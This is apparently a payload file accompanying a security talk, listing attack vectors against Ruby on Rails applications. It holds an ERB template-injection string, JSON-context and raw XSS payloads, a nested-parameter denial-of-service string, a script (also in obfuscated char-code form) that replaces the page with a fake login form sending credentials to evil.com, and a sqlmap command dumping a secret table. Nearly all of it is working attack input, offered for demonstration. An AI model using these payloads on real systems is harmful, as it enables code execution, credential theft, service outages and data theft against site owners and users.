This file contains some vectors for exploiting the vulnerabilities shown in the talk


RAILS SPECIFIC

dynamic views

id[inline]=<%= 2 * 2 %>
id%5Binline%5D%3D%3C%25%3D%202%20*%202%20%25%3E

xss in json

key=</script><script>alert(1);</script>

dos in parameters

a[a][a][a][a][a][a][a][a][a][a][a][a][a][a][a][a][a][a][a][a][a][a][a][a][a][a][a][a][a][a][a][a][a][a][a][a][a][a][a][a][a][a][a][a][a][a][a][a][a][a][a][a][a][a][a][a][a][a][a][a][a][a][a][a][a][a][a][a][a][a][a][a][a][a][a][a][a][a][a][a][a][a][a][a][a][a][a][a][a][a][a][a][a][a][a][a][a][a][a][a][a][a][a][a][a][a][a][a][a][a][a][a][a][a][a][a][a][a][a][a][a][a][a][a][a][a][a][a][a][a][a][a][a][a][a][a][a][a][a][a][a][a][a][a][a][a][a][a][a][a]=1

CROSS-SITE SCRIPTING

Raw

<script>alert(1)</script>

<script>
  var el=document.children[0].children[1];el.removeChild(el.children[0]);
  el.innerHTML = '<div style=""><p style="color:white">Login</p><form action="http://evil.com/hijack-creds"><input placeholder="username" name="name"></input><input placeholder="password" name="password" type="password"></input><input type="submit"></input></form></div>'
</script>

JS encoded

alert(1)

var str=''
var codes=[]
document.write('')

var str=new String()
var codes=[60,100,105,118,32,115,116,121,108,101,61,34,34,62,60,112,32,115,116,121,108,101,61,34,99,111,108,111,114,58,119,104,105,116,101,34,62,76,111,103,105,110,60,47,112,62,60,102,111,114,109,32,97,99,116,105,111,110,61,34,104,116,116,112,58,47,47,101,118,105,108,46,99,111,109,47,104,105,106,97,99,107,45,99,114,101,100,115,34,62,60,105,110,112,117,116,32,112,108,97,99,101,104,111,108,100,101,114,61,34,117,115,101,114,110,97,109,101,34,32,110,97,109,101,61,34,110,97,109,101,34,62,60,47,105,110,112,117,116,62,60,105,110,112,117,116,32,112,108,97,99,101,104,111,108,100,101,114,61,34,112,97,115,115,119,111,114,100,34,32,110,97,109,101,61,34,112,97,115,115,119,111,114,100,34,32,116,121,112,101,61,34,112,97,115,115,119,111,114,100,34,62,60,47,105,110,112,117,116,62,60,105,110,112,117,116,32,116,121,112,101,61,34,115,117,98,109,105,116,34,62,60,47,105,110,112,117,116,62,60,47,102,111,114,109,62,60,47,100,105,118,62]
for (var i=0;i!=codes.length;++i){ str+=String.fromCharCode(codes[i]) }
var el=document.children[0].children[1];el.removeChild(el.children[0]);
el.innerHTML=str


./sqlmap.py -u "http://localhost:3000/users.json?column=name&value=me" -p value --dump -T secret_table --technique=E
